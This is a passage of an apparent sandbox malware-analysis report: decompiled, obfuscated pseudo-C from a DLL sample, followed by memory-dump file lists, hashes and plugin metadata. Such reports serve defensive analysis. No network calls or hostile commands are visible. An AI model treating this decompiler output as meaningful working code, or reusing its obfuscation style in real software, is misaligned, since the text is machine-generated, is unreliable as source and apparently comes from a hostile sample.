            						_t613 =  *0x6d55d590; // 0x0
            						_t614 = _t613 + 1;
            						 *(_t883 + 0x38) = _t869 - 1;
            						 *0x6d55d590 = _t614;
            						 *( *(_t883 + 0x54) + _t683 * 2) = _t614;
            						_t615 =  *(_t683 + _t880) & 0x000000ff;
            						_t754 =  *0x6d55d58a; // 0x0
            						 *(_t883 + 0x6c) = _t615;
            						 *0x6d55d58a = _t754 + 1;
            						 *(_t883 + 0x64) = _t615 -  *0x6d55d574;
            						 *(_t883 + 0x88) =  *(_t883 + 0x88) + 1;
            						_t619 =  *0x6d55d5c0; // 0x0
            						 *0x6d55d5c0 = _t619 + 0xffff;
            						_t624 =  *0x6d55d5ac; // 0x0
            						_push(0x1925 - ( *( *(_t883 + 0x50) +  *( *(_t883 + 0x48)) * 2) & 0x0000ffff));
            						asm("cdq");
            						_t872 =  *(_t883 + 0x78);
            						_t681 =  *(_t883 + 0xb4);
            						_t630 = E6D507D3B(_t872,  *(_t883 + 0x88),  *(_t883 + 0x8c), _t754 & 0x000000ff, _t681, ( *(_t847 + _t683 * 4) |  *(_t883 + 0x88) + 0x00000001) & 0x0000ffff,  *( *((intOrPtr*)(_t883 + 0x70)) + 0x2f26) & 0x0000ffff ^  *(((_t619 + 0x0000ffff & 0x0000ffff) + 1) * 0xc +  *(_t883 + 0x48)),  *( *((intOrPtr*)(_t883 + 0x94)) + _t624 * 2) & 0x0000ffff,  *(_t883 + 0x54) % 0x823,  *((intOrPtr*)( *(_t883 + 0x7c) + 0x1c +  *(_t883 + 0x9c) * 4)));
            						_t826 =  *(_t883 + 0x68);
            						_t883 = _t883 + 0x50;
            						 *(_t883 + 0x48) = _t630 & 0x0000ffff;
            						_t875 =  *((intOrPtr*)(_t883 + 0x60));
            						 *(_t883 + 0x18) = 0x00001c9f / (_t826 & 0x0000ffff) & 0x0000ffff;
            						_t635 =  *0x6d55d57c; // 0x0
            						_t768 =  *(_t883 + 0x20) ^ ( *(_t635 + _t875) & 0x000000ff) + _t872;
            						_t829 = _t768 & 0x0000ffff;
            						 *(_t883 + 0x78) = _t768;
            						 *(_t883 + 0x44) = _t829;
            						__eflags = _t829 -  *(_t883 + 0x14);
            						if(_t829 <  *(_t883 + 0x14)) {
            							L20:
            							_t847 =  *(_t883 + 0x24);
            							goto L21;
            						}
            						_t769 =  *(_t883 + 0x64);
            						 *(_t883 + 0x54) =  *(_t883 + 0x13) & 0x000000ff;
            						 *(_t883 + 0x50) =  *(_t883 + 0x74) & 0x0000ffff;
            						 *(_t883 + 0x40) = _t681 * 3;
            						_t874 = _t829 * 3 +  *(_t883 + 0x68);
            						__eflags = _t874;
            						do {
            							 *( *(_t883 + 0x38) + _t681 * 4) =  *( *(_t883 + 0x38) + _t681 * 4) |  *(_t883 + 0x54) -  *0x6d55d598 + _t829 | 0x0000068d;
            							 *_t874 = _t829 -  *_t874;
            							_t874 = _t874 + 3;
            							asm("cdq");
            							_t832 =  *(_t883 + 0x40);
            							_t648 =  *(_t883 + 0x50) / _t769 -  *((intOrPtr*)(_t832 + _t875));
            							_t769 = _t769 - 1;
            							 *((char*)(_t832 + _t875)) = _t648;
            							_t833 =  *(_t883 + 0x44);
            							 *0x6d55d5a4 =  *0x6d55d5a4 & _t833;
            							_t829 = _t833 + 1;
            							 *(_t883 + 0x44) = _t829;
            							__eflags = _t829 -  *(_t883 + 0x14);
            						} while (_t829 >=  *(_t883 + 0x14));
            						 *(_t883 + 0x64) = _t769;
            						goto L20;
            					}
            					_t847 =  *(_t883 + 0x24);
            					if( *((intOrPtr*)( *(_t883 + 0x2c) + 6 + _t681 * 2)) < ( *( *(_t883 + 0x6c) + _t681 + 8) & 0x000000ff)) {
            						goto L16;
            					}
            					_t681 = _t681 + 1;
            					_t892 =  *0x6d55d580 - _t681; // 0x0
            					if(_t892 < 0) {
            						L15:
            						 *0x6d55d58a =  *0x6d55d58a - 1;
            						goto L21;
            					}
            					_t834 =  *(_t883 + 0x74);
            					 *(_t883 + 0x74) = _t834 + 1;
            					if( *((intOrPtr*)( *_t847 * 0xc + _t847)) != (_t834 & 0x0000ffff)) {
            						goto L15;
            					}
            					_t681 =  *(_t883 + 0x40);
            					_t652 =  *0x6d55d594; // 0x0
            					if( *((intOrPtr*)(_t652 + _t681 * 4)) == 0x13a) {
            						goto L15;
            					}
            					asm("cdq");
            					_t655 =  *0x6d55d588; // 0x0
            					 *(_t883 + 0x14) = 0x1c9e %  *(_t883 + 0x14);
            					_t837 =  *(_t883 + 0x1c);
            					 *((intOrPtr*)((_t837 & 0x0000ffff) + _t875)) =  *((intOrPtr*)((_t837 & 0x0000ffff) + _t875)) + (_t655 & 0x00000011);
            					_t838 = _t837 + 1;
            					_t657 =  *0x6d55d5bc; // 0x0
            					 *(_t883 + 0x1c) = _t838;
            					 *0x6d55d5d8 =  *0x6d55d5d8 |  *((intOrPtr*)(_t657 + 0x2814)) - 0x00001c33 &  *0x6d55d5b0;
            					_t661 = _t681;
            					_t681 = _t681 - 1;
            					_t895 =  *0x6d55d5dc - _t661; // 0x0
            					if(_t895 == 0) {
            						goto L21;
            					}
            					_t839 = _t838 & 0x0000ffff;
            					_t663 =  *0x6d55d578; // 0x0
            					 *0x6d55d5a0 = ( *(_t839 +  *(_t883 + 0x6c)) & 0x000000ff ^  *(_t663 + _t854 + 1) & 0x000000ff) -  *0x6d55d5a0;
            					_t715 =  *(_t839 + _t875) & 0x000000ff;
            					goto L39;
            				}
            				_t665 =  *0x6d55d5a8; // 0x0
            				if( *((intOrPtr*)(_t665 + _t815 * 4)) >  *(_t883 + 0x64)) {
            					goto L7;
            				}
            				_t666 =  *0x6d55d5ac; // 0x0
            				_t667 = _t666 + 1;
            				 *0x6d55d5ac = _t667;
            				if( *((intOrPtr*)( *(_t883 + 0x34) + ( *(_t883 + 0x1c) & 0x0000ffff) * 4)) <= ( *(_t667 + _t875 + 7) & 0x000000ff)) {
            					goto L7;
            				}
            				_t669 =  *0x6d55d5bc; // 0x0
            				_t777 =  *0x6d55d5e0; // 0x0
            				 *0x6d55d5a4 = ( *((intOrPtr*)(_t669 + _t681 * 4)) -  *(_t883 + 0x40)) %  *0x6d55d5a4;
            				_t818 =  *(_t883 + 0x64);
            				 *( *(_t883 + 0x34) + _t777 * 4) =  *( *(_t883 + 0x34) + _t777 * 4) & 0x000019cf - _t818;
            				_t778 =  *0x6d55d598; // 0x0
            				_t875 =  *((intOrPtr*)(_t883 + 0x60));
            				 *((char*)(_t778 + _t854)) = 0xb0;
            				_t749 =  *((intOrPtr*)(_t883 + 0x70));
            				 *((short*)( *((intOrPtr*)(_t883 + 0x70)) + 4 + _t681 * 2)) =  *((intOrPtr*)(0x7c + _t681 * 4)) -  *((intOrPtr*)( *((intOrPtr*)(_t883 + 0x70)) + 4 + _t681 * 2));
            				goto L8;
            			}

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e69754dd361af066caf9046e6b26e4ccf0d93c79d032087aa8031fe99889be54
            • Instruction ID: 61ca81288e2d52b53f9d50eafc8b4b0c06f302e515238787edb861f2e40b38ab
            • Opcode Fuzzy Hash: e69754dd361af066caf9046e6b26e4ccf0d93c79d032087aa8031fe99889be54
            • Instruction Fuzzy Hash: 9C5234755083908FCB16CF29C090A6ABBF1FB8A304F15496EF8DAC7761D778A941CB52
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 80%
            			E6D5169D9() {
            				signed int _t379;
            				signed int _t380;
            				signed int _t391;
            				signed int _t396;
            				short _t397;
            				signed int _t398;
            				intOrPtr _t401;
            				intOrPtr _t404;
            				signed int _t405;
            				signed int _t406;
            				signed int _t409;
            				intOrPtr _t411;
            				intOrPtr _t416;
            				signed int _t423;
            				signed short _t428;
            				intOrPtr _t435;
            				intOrPtr _t441;
            				intOrPtr _t442;
            				void* _t446;
            				signed int _t448;
            				signed int _t449;
            				signed int _t455;
            				intOrPtr _t460;
            				signed int _t463;
            				signed int _t464;
            				signed char _t467;
            				signed char _t468;
            				intOrPtr _t470;
            				signed int _t484;
            				signed int _t489;
            				signed int _t496;
            				signed short _t498;
            				signed short _t499;
            				signed int _t506;
            				signed int _t507;
            				signed int _t511;
            				signed int _t512;
            				signed int _t513;
            				signed int _t520;
            				signed int _t523;
            				signed int _t529;
            				signed char _t530;
            				signed char _t531;
            				signed int _t539;
            				signed int _t542;
            				intOrPtr _t544;
            				signed int _t549;
            				signed int _t550;
            				signed int _t551;
            				signed int _t552;
            				signed int _t566;
            				signed int _t572;
            				signed int _t575;
            				signed int _t577;
            				signed int _t578;
            				signed int* _t579;
            				signed int _t617;
            				signed int _t618;
            				signed int _t619;
            				signed int* _t621;
            				signed int _t622;
            				signed int _t623;
            				signed int _t624;
            				signed int _t625;
            				intOrPtr _t634;
            				signed int _t635;
            				intOrPtr _t648;
            				signed int* _t658;
            				intOrPtr _t665;
            				signed int _t666;
            				signed int* _t668;
            				signed int _t675;
            				signed int _t676;
            				signed int* _t686;
            				signed int* _t691;
            				intOrPtr _t692;
            				signed int _t695;
            				signed int _t697;
            				intOrPtr _t705;
            				signed int _t707;
            				signed int _t709;
            				signed int* _t710;
            				signed int _t713;
            				signed int _t714;
            				signed int _t715;
            				signed int _t716;
            				signed int _t718;
            				signed int* _t721;
            				signed int _t722;
            				intOrPtr _t725;
            				signed int* _t728;
            				signed short _t729;
            				signed short _t730;
            				intOrPtr _t731;
            				signed int _t732;
            				signed int _t733;
            				signed int _t739;
            				signed int _t741;
            				intOrPtr _t744;
            				signed short _t745;
            				void* _t748;
            				void* _t749;
            				void* _t750;
            				void* _t754;
            				void* _t758;
            
            				 *(_t748 + 0x14) = 0x1680;
            				 *0x6d55d5c0 =  *0x6d55d5c0 + 0xffff;
            				_t379 =  *0x6d55d58c; // 0x0
            				_t380 = _t379 - 1;
            				 *0x6d55d58c = _t380;
            				 *(_t748 + 0x24) = _t380;
            				 *(_t748 + 0x1c) =  *0x6d55d5d0 & 0x0000ffff &  *(_t748 + 0x5c) & 0x0000ffff;
            				 *(_t748 + 0x40) =  *0x6d55d578 & 0x0000ffff;
            				_t544 =  *((intOrPtr*)(_t748 + 0x48));
            				_t732 =  *(_t748 + 0x58);
            				 *(_t748 + 0x2c) = 0x1ca6 %  *0x6d55d580;
            				 *(_t748 + 0x34) = _t732;
            				_t709 = _t732;
            				 *(_t748 + 0x18) = _t732;
            				 *(_t748 + 0x38) =  *(_t544 + (_t732 + _t732) * 8);
            				 *(_t748 + 0x30) =  *0x6d55d59c & 0x0000ffff;
            				_t391 =  *0x6d55d5cc; // 0x0
            				 *(_t748 + 0x3c) = _t732;
            				_t733 = _t732 + 1;
            				_t691 =  *0x6d55d5b4; // 0x0
            				 *(_t748 + 0x28) = _t691;
            				 *( *((intOrPtr*)(_t748 + 0x4c)) + _t733 * 4) = _t391 %  *0x6d55d5a4;
            				 *0x6d55d5e4 = ( *0x6d55d59c & 0x0000ffff |  *0x6d55d5c0 & 0x0000ffff) &  *0x6d55d584;
            				 *(_t748 + 0x58) = _t733;
            				 *(_t748 + 0x10) = _t691;
            				_t396 =  *0x6d55d5b4; // 0x0
            				 *((intOrPtr*)( *0x9e1 * 0xc +  *((intOrPtr*)(_t748 + 0x4c)))) =  *((intOrPtr*)( *0x9e1 * 0xc +  *((intOrPtr*)(_t748 + 0x4c)))) + _t396;
            				_t648 =  *((intOrPtr*)(_t748 + 0x54));
            				_t397 =  *0x6d55d58c; // 0x0
            				 *((short*)(_t709 * 6 + _t648)) = _t397;
            				_t398 =  *0x6d55d598; // 0x0
            				_t566 =  *0x6d55d5cc; // 0x0
            				 *(_t709 +  *_t691 * 4) = _t566 -  *((intOrPtr*)(_t544 + 0x6860)) |  *(_t648 + _t398 * 2) & 0x0000ffff;
            				_t710 = _t691;
            				_t401 =  *0x6d55d5a0; // 0x0
            				_t750 = _t401 -  *0x6d55d5d4; // 0x0
            				if(_t750 == 0 ||  *((intOrPtr*)(_t648 +  *_t710 * 8)) <=  *(_t748 + 0x5c)) {
            					if( *((intOrPtr*)( *(_t748 + 0x24) + _t733 * 4)) !=  *(_t748 + 0x2c) + 1) {
            						_t692 =  *((intOrPtr*)(_t748 + 0x50));
            						_t404 =  *0x6d55d570; // 0x0
            						 *(_t748 + 0x14) = 0x1684;
            						if( *((intOrPtr*)(_t404 +  *0x1680 * 4)) != ( *(_t692 + 0x19aa) & 0x0000ffff) || ( *0x6d55d5d0 & 0x0000ffff) >  *(_t748 + 0x3c)) {
            							_t572 =  *0x6d55d5ac; // 0x0
            							_t405 =  *0x6d55d5cc; // 0x0
            							 *((intOrPtr*)(_t544 + _t572 * 4)) =  *((intOrPtr*)(_t544 + _t572 * 4)) + _t405;
            							 *0x6d55d5cc =  *0x6d55d5cc - 1;
            							_t406 =  *0x6d55d5d4; // 0x0
            							 *(_t748 + 0x3c) =  *((intOrPtr*)( *((intOrPtr*)(_t748 + 0x4c)) + _t406 * 8)) + _t406;
            							 *0x6d55d5d4 = _t406 + 1;
            							_t409 =  *0x6d55d5e0; // 0x0
            							_t575 =  *0x6d55d57c; // 0x0
            							_t411 =  *0x6d55d570; // 0x0
            							 *0x6d55d57c = _t575 + 1;
            							_t577 =  *0x6d55d5ac; // 0x0
            							_t578 = _t577 + 1;
            							 *0x6d55d5ac = _t578;
            							_push( *( *(_t748 + 0x10) + 0x78 +  *(_t748 + 0x58) * 4) | 0x0000067d);
            							_push( *0x49f5);
            							_push(_t578);
            							_push( *((intOrPtr*)( *(_t748 + 0x38) + ( *0x6d55d5c0 & 0x0000ffff) * 4)) + 0x1427);
            							_push( *((intOrPtr*)(_t411 + 0x6f24)) - 0x12c);
            							_push( *( *((intOrPtr*)(_t748 + 0x54)) + 0xa + _t409 * 2) & 0x0000ffff &  *( *((intOrPtr*)(_t748 + 0x50)) + _t575 * 8) & 0x0000ffff);
            							_push( *(_t692 + 0x50 +  *_t710 * 2) & 0x0000ffff);
            							_push( *(_t748 + 0x3c));
            							_t416 = E6D5147B8();
            							_t579 =  *(_t748 + 0x30);
            							_t748 = _t748 + 0x20;
            							_t544 =  *((intOrPtr*)(_t748 + 0x48));
            							 *((intOrPtr*)( *(_t748 + 0x28) +  *_t579 * 0xc)) = _t416;
            							goto L10;
            						} else {
            							goto L11;
            						}
            					}
            					goto L3;
            				} else {
            					L3:
            					_t675 =  *0x6d55d5b0; // 0x0
            					_t707 = _t544 + _t733 * 4;
            					_t498 =  *0x6d55d5c4; // 0x0
            					_t676 = _t675 - 1;
            					_t622 =  *0x6d55d5ac; // 0x0
            					_t499 = _t498 + 1;
            					 *0x6d55d5c4 = _t499;
            					_t623 = _t622 + 1;
            					 *0x6d55d5ac = _t623;
            					 *0x6d55d5b0 = _t676;
            					 *_t707 = (_t499 & 0x0000ffff & _t676 | _t623) -  *_t707;
            					_t624 =  *0x6d55d5ac; // 0x0
            					 *(_t748 + 0x2c) = _t707;
            					_t692 =  *((intOrPtr*)(_t748 + 0x50));
            					_t625 = _t624 - 1;
            					 *0x6d55d574 = ( *(_t692 + _t624 * 2) & 0x0000ffff) - 0x1d69;
            					_t506 =  *0x6d55d580; // 0x0
            					_t507 = _t506 + 1;
            					 *0x6d55d5ac = _t625;
            					 *0x6d55d580 = _t507;
            					 *((intOrPtr*)( *(_t748 + 0x1c) + 0x14 + _t507 * 4)) = _t625 -  *((intOrPtr*)( *(_t748 + 0x1c) + 0x14 + _t507 * 4));
            					_t728 =  &(_t710[1]);
            					 *(_t748 + 0x10) = _t728;
            					if( *((intOrPtr*)(_t544 + 0x4c + ( *_t710 +  *_t710) * 8)) > _t733) {
            						L5:
            						if( *((intOrPtr*)(_t692 +  *_t728 * 2)) != 0xf3f) {
            							L11:
            							 *0x6d55d578 =  *0x6d55d578 + 0xf8;
            							_t713 =  *0x6d55d5d4; // 0x0
            							_t714 = _t713 + 1;
            							 *0x6d55d5d4 = _t714;
            							_t193 = _t714 + 1; // 0x2
            							asm("cdq");
            							_t739 =  *(_t748 + 0x58);
            							 *(_t748 + 0x2c) = (( *(_t692 +  *(_t748 + 0x18) * 2) & 0x0000ffff) +  *((intOrPtr*)( *((intOrPtr*)(_t748 + 0x4c)) + 0x26d0))) /  *( *((intOrPtr*)(_t748 + 0x4c)) + (_t193 + _t193) * 8) -  *(_t748 + 0x40) & 0x0000ffff;
            							_t715 =  *( *((intOrPtr*)(_t748 + 0x54)) + _t714 * 2) & 0x0000ffff;
            							_t423 =  *0x6d55d57c; // 0x0
            							if(_t715 > _t423) {
            								L18:
            								_t695 =  *(_t748 + 0x30);
            								 *0x6d55d57c = _t423 + 1;
            								_t716 =  *(_t695 +  *(_t748 + 0x18) * 2) & 0x0000ffff;
            								if(_t716 !=  *((intOrPtr*)( *0x6d55d578 * 0xc + _t544))) {
            									L21:
            									_t428 =  *0x6d55d5e0; // 0x0
            									 *0x6d55d5e0 = _t428 + 1;
            									_push( *0x6d55d5b4);
            									asm("cdq");
            									_t741 =  *(_t748 + 0x5c);
            									_push(( *0x6d55d5d0 & 0x0000ffff) +  *0x6d55d5d4);
            									_push(_t741);
            									_push(0x6b9 /  *( *((intOrPtr*)(_t748 + 0x4c)) +  *( *(_t748 + 0x14)) * 4));
            									_push( *( *((intOrPtr*)(_t748 + 0x50)) +  *( *(_t748 + 0x10)) * 2) & 0x0000ffff);
            									_push( *(_t748 + 0x64) & 0x0000ffff);
            									_push(_t428);
            									_push(0x1772 - ( *0x6d55d5c4 & 0x0000ffff));
            									_t435 = E6D5147B8();
            									_t658 =  *(_t748 + 0x34);
            									_t749 = _t748 + 0x20;
            									_t697 =  *(_t749 + 0x48);
            									 *(_t749 + 0x14) =  &(_t658[1]);
            									 *((intOrPtr*)(_t697 +  *_t658 * 4)) = _t435;
            									 *( *((intOrPtr*)(_t749 + 0x30)) +  *( *(_t749 + 0x10)) * 2) = ( *( *((intOrPtr*)(_t749 + 0x30)) +  *( *(_t749 + 0x10)) * 2) & 0x0000ffff) * ( *0x6d55d598 & 0x0000ffff);
            									_t718 =  *0x6d55d598; // 0x0
            									_t441 =  *0x6d55d5c8; // 0x0
            									 *0x6d55d574 = ( *0x6d55d588 & 0x0000ffff ^  *(_t697 + (_t718 + _t718) * 8)) %  *0x6d55d574;
            									_t549 =  *(_t441 + _t718 * 4);
            									_t442 =  *0x6d55d594; // 0x0
            									 *(_t749 + 0x28) = _t549;
            									if(_t549 >=  *((intOrPtr*)(_t442 + 0x84 +  *(_t749 + 0x18) * 4))) {
            										L24:
            										return 0x1c03;
            									}
            									 *(_t749 + 0x48) = _t697 + (_t741 + 1) * 4;
            									_t721 =  &(( &(( *(_t749 + 0x4c))[4]))[_t549]);
            									 *(_t749 + 0x28) = _t549 * 6 +  *((intOrPtr*)(_t749 + 0x54));
            									_t446 = 0x2c;
            									 *(_t749 + 0x4c) = _t721;
            									 *((intOrPtr*)(_t749 + 0x40)) = _t446 - _t697;
            									do {
            										_t448 =  *0x6d55d5b4; // 0x0
            										_t449 = _t448 + 1;
            										 *0x6d55d5b4 = _t449;
            										 *0x6d55d5e0 =  *0x6d55d5e0 + (_t449 & _t741);
            										_push(_t549);
            										_push(0x12e9);
            										_push( *( *((intOrPtr*)(_t749 + 0x54)) + 0x30 +  *( *(_t749 + 0x14)) * 2) & 0x0000ffff);
            										_push(0x503);
            										_push(0);
            										_push(_t549);
            										_push( *(_t749 + 0x64) & 0x0000ffff);
            										_t455 = E6D5061B5();
            										_t550 =  *0x6d55d58c; // 0x0
            										 *0x6d55d5b4 = _t455;
            										_t722 =  *(_t749 + 0x74);
            										_t551 = _t550 - 1;
            										 *0x6d55d58c = _t551;
            										_push(_t551);
            										_t552 =  *(_t749 + 0x48);
            										 *((intOrPtr*)(_t749 + 0x78)) = _t722 - 1;
            										_t725 =  *((intOrPtr*)(_t749 + 0x68)) - 4;
            										_t460 =  *0x6d55d5a8; // 0x0
            										 *((intOrPtr*)(_t749 + 0x68)) = _t725;
            										_push(_t552);
            										_push( *( *(_t749 + 0x48)) & 0x0000ffff ^  *0x6d55d58a & 0x000000ff);
            										_push( *((intOrPtr*)( *((intOrPtr*)(_t749 + 0x60)) + _t725 + _t460)));
            										_push( *( *((intOrPtr*)(_t749 + 0x30)) +  *(_t749 + 0x48) * 4) *  *(_t749 + 0x48));
            										_push(_t551 % ( *( *((intOrPtr*)(_t749 + 0x6c)) + _t722 * 2) & 0x0000ffff));
            										_push(0);
            										_push( *_t721 & 0x00001857);
            										_t463 = E6D5147B8();
            										_t665 =  *((intOrPtr*)(_t749 + 0x8c));
            										_t749 = _t749 + 0x3c;
            										 *0x6d55d5ac = _t463;
            										_t721 =  &(( *(_t749 + 0x4c))[1]);
            										_t464 =  *0x6d55d598; // 0x0
            										 *(_t749 + 0x4c) = _t721;
            										 *( *(_t749 + 0x48)) =  *( *(_t749 + 0x48)) & ( *(_t665 + 0xa + _t464 * 2) & 0x0000ffff) +  *0x6d55d5dc;
            										 *0x6d55d598 =  *0x6d55d598 - 1;
            										_t467 =  *0x6d55d58a; // 0x0
            										_t468 = _t467 + 1;
            										_t666 =  *(_t749 + 0x34);
            										 *0x6d55d58a = _t468;
            										 *(_t666 +  *( *(_t749 + 0x10)) * 8) =  *(_t666 +  *( *(_t749 + 0x10)) * 8) | _t468 & 0x000000ff;
            										_t549 = _t552 + 1;
            										 *((intOrPtr*)(_t749 + 0x24)) =  *((intOrPtr*)(_t749 + 0x24)) + 6;
            										 *(_t749 + 0x28) = _t549;
            										_t470 =  *0x6d55d594; // 0x0
            										_t741 =  *(_t749 + 0x58);
            									} while (_t549 <  *((intOrPtr*)(_t470 + 0x84 + _t666 * 4)));
            									goto L24;
            								}
            								_t744 =  *((intOrPtr*)(_t748 + 0x54));
            								do {
            									asm("cdq");
            									 *0x6d55d5c4 = ( *(_t744 + 0x1dae) & 0x0000ffff) * 0x1b62;
            									_push(0xa64 % _t716);
            									_push( *0x6d55d5e0 & 0x0000ffff);
            									_push(0x1486);
            									_push(0x447);
            									_push( *(_t748 + 0x34) & 0x0000ffff);
            									_push(_t716);
            									_push( *(_t748 + 0x68) & 0x0000ffff);
            									 *((short*)(_t695 + _t716 * 2)) = E6D5061B5();
            									_t748 = _t748 + 0x1c;
            									_t716 = _t716 + 1;
            								} while (_t716 ==  *((intOrPtr*)( *0x6d55d578 * 0xc + _t544)));
            								goto L21;
            							}
            							_t668 = _t544 + _t715 * 4;
            							 *(_t748 + 0x28) = _t668;
            							_t617 = (_t715 << 4) +  *(_t748 + 0x1c);
            							 *(_t748 + 0x24) = _t617;
            							 *(_t748 + 0x20) =  *(_t748 + 0x34) + _t739 * 2 + 0xe;
            							 *(_t748 + 0x40) =  *((intOrPtr*)(_t748 + 0x54)) - _t544;
            							_t705 =  *((intOrPtr*)(_t748 + 0x50));
            							do {
            								_t745 =  *(_t748 + 0x5c);
            								 *0x6d55d57c = _t423 + 1;
            								_t618 = _t745;
            								 *((short*)( *((intOrPtr*)(_t748 + 0x54)) + _t715 * 2)) =  *_t617;
            								 *( *(_t748 + 0x1c) + (_t618 & 0x0000ffff) * 4) =  *( *(_t748 + 0x1c) + (_t745 & 0x0000ffff) * 4) * _t715;
            								_t619 =  *(_t748 + 0x24);
            								_t544 =  *((intOrPtr*)(_t748 + 0x48));
            								 *_t668 = _t618 & 0x0000ffff;
            								_t484 =  *0x6d55d5cc; // 0x0
            								 *0x6d55d588 =  *0x6d55d588 + _t484;
            								_t758 =  *0x6d55d5d4 - _t715; // 0x0
            								if(_t758 <= 0) {
            									_t705 =  *((intOrPtr*)(_t748 + 0x50));
            									if( *( *(_t748 + 0x20)) > 0x12b5) {
            										 *0x6d55d59c =  *0x6d55d59c ^ 0x00001f1e;
            										asm("cdq");
            										_t621 =  *(_t748 + 0x28);
            										 *0x6d55d5c4 = _t715 % ( *0x6d55d5c4 & 0x0000ffff);
            										 *(_t748 + 0x20) =  *(_t748 + 0x20) + 2;
            										 *_t621 =  *_t621 & 0x00000000;
            										_t489 =  *0x6d55d580; // 0x0
            										 *(_t748 + 0x58) =  *(_t748 + 0x58) + 1;
            										 *_t621 = _t489 %  *(_t544 + 0x1e24) + _t715;
            										_t619 =  *(_t748 + 0x24);
            										 *0x6d55d5e4 = ( *( *((intOrPtr*)(_t748 + 0x4c)) + 0x7798) ^  *0x6d55d5b0) %  *0x6d55d5e4;
            										_t668 =  *(_t748 + 0x28);
            									}
            								} else {
            									 *(_t668 +  *(_t748 + 0x40)) =  *(_t668 +  *(_t748 + 0x40)) ^ 0x0000120f;
            									_t496 =  *0x6d55d598; // 0x0
            									 *(_t705 + _t496 * 2) =  *(_t705 + _t496 * 2) & 0x00000991;
            									_t544 =  *((intOrPtr*)(_t748 + 0x48));
            								}
            								_t423 =  *0x6d55d57c; // 0x0
            								_t715 = _t715 + 1;
            								_t617 = _t619 + 0x10;
            								_t668 =  &(_t668[1]);
            								 *(_t748 + 0x24) = _t617;
            								 *(_t748 + 0x28) = _t668;
            							} while (_t715 <= _t423);
            							goto L18;
            						}
            						L6:
            						_t511 =  *0x6d55d598; // 0x0
            						_t729 =  *(_t748 + 0x5c);
            						 *((intOrPtr*)(_t544 + _t511 * 4)) = 0x50a;
            						_t512 =  *0x6d55d5d4; // 0x0
            						_t513 =  *0x6d55d5e4; // 0x0
            						 *(_t748 + 0x3c) =  *( *((intOrPtr*)(_t748 + 0x4c)) + _t512 * 4) | _t513;
            						 *0x6d55d5e4 = _t513 - 1;
            						 *(_t748 + 0x5c) = 0x725;
            						 *(_t748 + 0x38) =  *(_t733 * 6 + _t692 + 2) & 0x0000ffff |  *0x6d55d598;
            						 *(_t748 + 0x20) = ( *(_t748 + 0x5c) & 0x0000ffff) /  *( *(_t748 + 0x2c));
            						_t520 =  *0x6d55d5dc; // 0x0
            						_t634 =  *0x6d55d5bc; // 0x0
            						 *(_t748 + 0x24) = _t520 / 0x1349;
            						 *(_t748 + 0x2c) =  *0x6d55d5d8 * 0x1eff;
            						_t523 =  *0x6d55d58c; // 0x0
            						_t635 =  *0x6d55d574; // 0x0
            						asm("cdq");
            						_t730 = _t729 + 1;
            						_push(( *(_t748 + 0x28))[_t729 & 0x0000ffff] %  *(_t748 + 0x5c));
            						 *(_t748 + 0x74) = _t730;
            						_t529 = E6D51755D( *((intOrPtr*)(_t748 + 0x60)),  *(_t748 + 0x58),  *(_t748 + 0x3c),  *(_t748 + 0x3c),  *(_t748 + 0x40), _t523 /  *0x6d55d580,  *(_t634 +  *(_t748 + 0x58) * 4) & 0x00001ec5,  *((intOrPtr*)(_t634 + 0x80 +  *(_t748 + 0x58) * 4)), _t635 ^  *0x6d55d58c);
            						_t686 =  *(_t748 + 0x38);
            						_t748 = _t748 + 0x28;
            						_t544 =  *((intOrPtr*)(_t748 + 0x48));
            						 *0x6d55d5d8 = _t529;
            						_t530 =  *0x6d55d58a; // 0x0
            						_t531 = _t530 - 1;
            						 *0x6d55d58a = _t531;
            						 *(_t748 + 0x10) =  &(_t686[1]);
            						 *((intOrPtr*)(_t544 + 0x4c +  *_t686 * 4)) =  *((intOrPtr*)(_t544 + 0x4c +  *_t686 * 4)) + (_t531 & 0x000000ff) + 0x699;
            						_t731 =  *((intOrPtr*)(_t748 + 0x4c));
            						asm("cdq");
            						 *(_t731 + (_t730 & 0x0000ffff) * 8) = (( *( *((intOrPtr*)(_t748 + 0x54)) + 0x1580) & 0x0000ffff) + 0x1b1b) %  *(_t731 + (_t730 & 0x0000ffff) * 8);
            						_t539 =  *0x6d55d57c; // 0x0
            						asm("cdq");
            						asm("cdq");
            						 *(_t731 + ( *(_t748 + 0x58) + 2 +  *(_t748 + 0x58) + 2) * 8) = _t539 /  *0x6d55d5ac /  *(_t731 + ( *(_t748 + 0x58) + 2 +  *(_t748 + 0x58) + 2) * 8);
            						L10:
            						_t692 =  *((intOrPtr*)(_t748 + 0x50));
            						goto L11;
            					}
            					_t542 =  *0x6d55d5b4; // 0x0
            					_t754 = _t542 -  *0x6d55d578; // 0x0
            					if(_t754 > 0) {
            						goto L6;
            					}
            					goto L5;
            				}
            			}

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
